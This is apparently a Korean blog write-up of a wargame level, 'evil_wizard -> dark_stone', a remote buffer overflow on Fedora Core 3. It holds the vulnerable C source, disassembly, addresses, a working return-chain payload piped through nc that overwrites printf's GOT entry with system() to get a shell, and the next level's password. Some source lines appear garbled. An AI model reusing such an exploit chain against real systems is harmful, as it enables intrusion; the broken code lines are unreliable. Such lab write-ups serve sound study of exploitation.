[5] evil_wizard -> dark_stone ( GOT Overwriting & Remote BOF )

2017. 12. 1. 20:08SystemHacking/Fedora Catle



evil_wizard / get down like that

이전 문제와 푸는 방법은 같지만 Remote 라는 점만 다르다 ( cat 과 nc를 이용한 풀이 )


[ dark_stone.c ]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
 
/*
        The Lord of the BOF : The Fellowship of the BOF
        - dark_stone
        - Remote BOF on Fedora Core 3
        - hint : GOT overwriting again
        - port : TCP 8888
*/
 
#include <stdio.h>
 
// magic potion for you
void pop_pop_ret(void)
{
        asm("pop %eax");
        asm("pop %eax");
        asm("ret");
}
 
int main()
{
        char buffer[256];
        char saved_sfp[4];
        int length;
        char temp[1024];
 
        printf("dark_stone : how fresh meat you are!\n");
        printf("you : ");
        fflush(stdout);
 
        // give me a food
        fgets(temp, 1024, stdin); // 오버 플로우 발생 !
 
        // for disturbance RET sleding
        length = strlen(temp);
 
        // save sfp
        memcpy(saved_sfp, buffer+2644);
 
        // overflow!!
        strcpy(buffer, temp);
 
        // restore sfp
        memcpy(buffer+264, saved_sfp, 4);
 
        // disturbance RET sleding
        memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));
 
        // buffer cleaning
        memset(0xf6ffe00000xf7000000-0xf6ffe000);
 
        printf("%s\n", buffer);
}

cs



[ 소스코드 디버깅 ]

0x080484f8 <main+0>: push   ebp

0x080484f9 <main+1>: mov    ebp,esp

0x080484fb <main+3>: sub    esp,0x518

0x08048501 <main+9>: and    esp,0xfffffff0

....

0x0804851f <main+39>: call   0x8048408 <_init+104> printf()

0x08048524 <main+44>: add    esp,0x10

0x08048527 <main+47>: sub    esp,0xc

0x0804852a <main+50>: push   0x804873e

0x0804852f <main+55>: call   0x8048408 <_init+104> printf()

0x08048534 <main+60>: add    esp,0x10

0x08048537 <main+63>: sub    esp,0xc

0x0804853a <main+66>: push   ds:0x8049868

0x08048540 <main+72>: call   0x80483c8 <_init+40> fflush()

0x08048545 <main+77>: add    esp,0x10

0x08048548 <main+80>: sub    esp,0x4

....

0x0804854b <main+83>: push   ds:0x804986c

0x08048551 <main+89>: push   0x400

0x08048556 <main+94>: lea    eax,[ebp-1304]

0x0804855c <main+100>: push   eax

0x0804855d <main+101>: call   0x80483d8 <_init+56> fgets(temp,1024,stdin)

....

0x08048580 <main+136>: push   0x4

0x08048582 <main+138>: lea    eax,[ebp-264]

0x08048588 <main+144>: add    eax,0x108

0x0804858d <main+149>: push   eax

0x0804858e <main+150>: lea    eax,[ebp-268]

0x08048594 <main+156>: push   eax

0x08048595 <main+157>: call   0x8048418 <_init+120> memcpy(saved_sfp,buffer+264,4)

0x0804859a <main+162>: add    esp,0x10

0x0804859d <main+165>: sub    esp,0x8

....

0x080485a0 <main+168>: lea    eax,[ebp-1304]

0x080485a6 <main+174>: push   eax

0x080485a7 <main+175>: lea    eax,[ebp-264]

0x080485ad <main+181>: push   eax

0x080485ae <main+182>: call   0x8048438 <_init+152> strcpy(buffer,temp)

....                           strcpy's PLT

0x0804861a <main+290>: add    esp,0x10

0x0804861d <main+293>: sub    esp,0x8

0x08048620 <main+296>: lea    eax,[ebp-264]

0x08048626 <main+302>: push   eax

0x08048627 <main+303>: push   0x8048745

0x0804862c <main+308>: call   0x8048408 <_init+104> printf("%s\n",buffer)

  printf's PLT

0x08048631 <main+313>: add    esp,0x10

0x08048634 <main+316>: leave  

0x08048635 <main+317>: ret    

0x08048636 <main+318>: nop    

0x08048637 <main+319>: nop  


[ Stack ]

temp                1024byte

length                4byte

dummy                8byte

saved_sfp            4byte


buffer                256byte

dummy                8byte

saved ebp            0xfee87448고정

saved eip


[ 사용할 주소 ]

[evil_wizard@Fedora_1stFloor tmp]$ ./find

"/bin/sh" is at 0x833603

printf /bin/sh

strcpy() plt : 0x08048438 

&pop_pop_ret : 0x080484f3

&system() : 0x007507c0

printf() plt : 0x08048408 


[ PLT & GOT 계산 ]

0x0804851f <main+39>: call   0x8048408 <_init+104> printf()

(gdb) x/3i 0x8048408           printf's PLT

0x8048408 <_init+104>: jmp    ds:0x804984c

0x804840e <_init+110>: push   0x20

0x8048413 <_init+115>: jmp    0x80483b8 <_init+24>

(gdb) x/x 0x804984c

0x804984c <_GLOBAL_OFFSET_TABLE_+28>: 0x0804840e     printf's GOT


0x804984c 위치의 값을 &system()로 변조한다



[ 변조할 문자 ]

* 0x80484d0 <frame_dummy+12>:     0xc0    0x74    0x19    0xb8

  0x80484d4 <frame_dummy+16>:     0x00 


* 0x8048364 <__libc_utmp_lock+125851260>: 0x07 0x01 0x00

* 0x80482b4 <__libc_utmp_lock+125851084>: 0x75 0x74 0x00 0x66

* 0x8048366 <__libc_utmp_lock+125851262>: 0x00


[ Payload ]

[evil_wizard@Fedora_1stFloor ~]$ (python -c 'print "A" * 268 + "\x38\x84\x04\x08" + "\xf3\x84\x04\x08" + "\x4c\x98\x04\x08" + "\xd0\x84\x04\x08" + "\x38\x84\x04\x08" + "\xf3\x84\x04\x08" + "\x4d\x98\x04\x08" + "\x64\x83\x04\x08" + "\x38\x84\x04\x08" + "\xf3\x84\x04\x08" + "\x4e\x98\x04\x08" + "\xb4\x82\x04\x08" + "\x38\x84\x04\x08" + "\xf3\x84\x04\x08" + "\x4f\x98\x04\x08" + "\x66\x83\x04\x08" + "\x08\x84\x04\x08" + "AAAA" + "\x03\x36\x83\x00" + "\x00\x00\x00\x0a"';cat) | nc localhost 8888

dark_stone : how fresh meat you are!

you :

id

uid=505(dark_stone) gid=505(dark_stone) context=user_u:system_r:unconfined_t

my-pass

euid = 505

let there be light